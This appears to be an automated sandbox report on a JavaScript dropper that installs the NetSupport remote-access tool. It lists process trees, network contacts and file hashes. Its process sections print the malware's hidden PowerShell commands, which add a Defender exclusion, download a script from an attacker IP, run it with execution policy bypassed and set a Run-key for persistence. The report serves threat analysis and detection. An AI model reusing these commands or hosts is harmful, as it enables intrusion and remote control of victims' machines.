Malware Analysis Report

2025-06-16 05:06

Sample ID 230527-hj77nsba65
Target c80a26b806b3486c6157d8904c2e13e7.js
SHA256 64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81

Threat Level: Known bad

The file c80a26b806b3486c6157d8904c2e13e7.js was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

Process spawned unexpected child process

NetSupport

Blocklisted process makes network request

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-27 06:47

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-27 06:47

Reported

2023-05-27 06:49

Platform

win10v2004-20230220-en

Max time kernel

82s

Max time network

140s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js

Signatures

NetSupport

rat netsupport

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VCRuntmeLib_1 = "C:\\Users\\Admin\\AppData\\Roaming\\VCRuntmeLib_1\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js

C:\Windows\system32\cmd.exe

cmd /c start /MIN C:\ProgramData\BLD.bat

C:\Windows\system32\cmd.exe

cmd /c start C:\ProgramData\zayavka2.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -ep bypass C:\ProgramData\archive.ps1

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

"C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 188.227.59.169:80 188.227.59.169 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 169.59.227.188.in-addr.arpa udp
US 188.227.59.169:80 188.227.59.169 tcp
US 8.8.8.8:53 240.232.18.117.in-addr.arpa udp
US 8.8.8.8:53 250.255.255.239.in-addr.arpa udp
US 8.8.8.8:53 golden-scalen.com udp
US 86.38.202.175:80 golden-scalen.com tcp
US 86.38.202.175:443 golden-scalen.com tcp
US 8.8.8.8:53 175.202.38.86.in-addr.arpa udp
US 8.8.8.8:53 xoomep1.com udp
NL 80.66.88.143:1935 xoomep1.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.67:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 67.138.172.62.in-addr.arpa udp
US 8.8.8.8:53 143.88.66.80.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 52.168.117.169:443 tcp
US 8.8.8.8:53 64.13.109.52.in-addr.arpa udp
US 93.184.220.29:80 tcp
US 8.247.210.254:80 tcp
US 8.247.210.254:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp

Files

C:\ProgramData\BLD.bat

MD5 018d63793042f588a85968475d98decf
SHA1 2c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256 afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512 ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a

C:\ProgramData\zayavka2.txt

MD5 6cea5f86700d707b53b8f4a67d1ccf29
SHA1 37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA256 6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512 d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29

memory/4184-140-0x00000269BC630000-0x00000269BC640000-memory.dmp

memory/4184-141-0x00000269BC630000-0x00000269BC640000-memory.dmp

memory/4184-147-0x00000269BD050000-0x00000269BD072000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hv30kewd.nxy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4184-153-0x00000269BC630000-0x00000269BC640000-memory.dmp

memory/4184-156-0x00000269BC630000-0x00000269BC640000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 75b4b2eecda41cec059c973abb1114c0
SHA1 11dadf4817ead21b0340ce529ee9bbd7f0422668
SHA256 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA512 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

C:\ProgramData\archive.ps1

MD5 50dc5faa02227c0aefa8b54c8e5b2b0d
SHA1 27fe39b6b053685d4c781a7fa809840ebaab15d7
SHA256 aafc02e9f9c6ce1e9ff7aff753e5656d3d26041e06b78a9fd60ca6fe5127e09b
SHA512 5bb8701fa6b026e99a8f269b89660ee8abba7c88a654f756d455a13e418a29c75e1742278046985bcc599151f0838591ef58ae8f742016153e43c8c5a78da442

memory/1004-169-0x000001F5397E0000-0x000001F5397EA000-memory.dmp

memory/1004-170-0x000001F539850000-0x000001F539860000-memory.dmp

memory/1004-171-0x000001F539850000-0x000001F539860000-memory.dmp

memory/1004-172-0x000001F539850000-0x000001F539860000-memory.dmp

memory/1004-173-0x000001F53A6B0000-0x000001F53A6C4000-memory.dmp

memory/4184-174-0x00000269BC630000-0x00000269BC640000-memory.dmp

memory/1004-175-0x000001F53A6F0000-0x000001F53A702000-memory.dmp

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

MD5 c4f1b50e3111d29774f7525039ff7086
SHA1 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

MD5 c4f1b50e3111d29774f7525039ff7086
SHA1 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

MD5 c4f1b50e3111d29774f7525039ff7086
SHA1 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICL32.dll

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICL32.DLL

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\NSM.LIC

MD5 390c964070626a64888d385c514f568e
SHA1 a556209655dcb5e939fd404f57d199f2bb6da9b3
SHA256 ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
SHA512 f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.ini

MD5 edfb8d26fa34436f2e92d5be1cb5901b
SHA1 79bffe330575dcb9d0fe746325bc42e48da397f4
SHA256 2b8fcbb905bd0a948a924a0f09534bac65ca444e023e5de301f4d4f83bc840e5
SHA512 682f5e977462f6f73ad2698f5c17473d8a7037fbbb0d6b014783f6ac18405d0731f4e2b43f85a45d3d01b1cc9c676bd03fe6932a2293d2f9ab3b49f7ea31e40a

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-27 06:47

Reported

2023-05-27 06:49

Platform

win7-20230220-en

Max time kernel

31s

Max time network

33s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js

C:\Windows\system32\cmd.exe

cmd /c start /MIN C:\ProgramData\BLD.bat

C:\Windows\system32\cmd.exe

cmd /c start C:\ProgramData\zayavka2.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt

Network

Country Destination Domain Proto
US 188.227.59.169:80 188.227.59.169 tcp

Files

C:\ProgramData\BLD.bat

MD5 018d63793042f588a85968475d98decf
SHA1 2c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256 afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512 ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a

C:\ProgramData\zayavka2.txt

MD5 6cea5f86700d707b53b8f4a67d1ccf29
SHA1 37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA256 6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512 d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29

memory/892-74-0x000000001B3A0000-0x000000001B682000-memory.dmp

memory/892-75-0x0000000002010000-0x0000000002018000-memory.dmp

memory/892-76-0x0000000002610000-0x0000000002690000-memory.dmp

memory/892-77-0x0000000002610000-0x0000000002690000-memory.dmp

memory/892-78-0x000000000261B000-0x0000000002652000-memory.dmp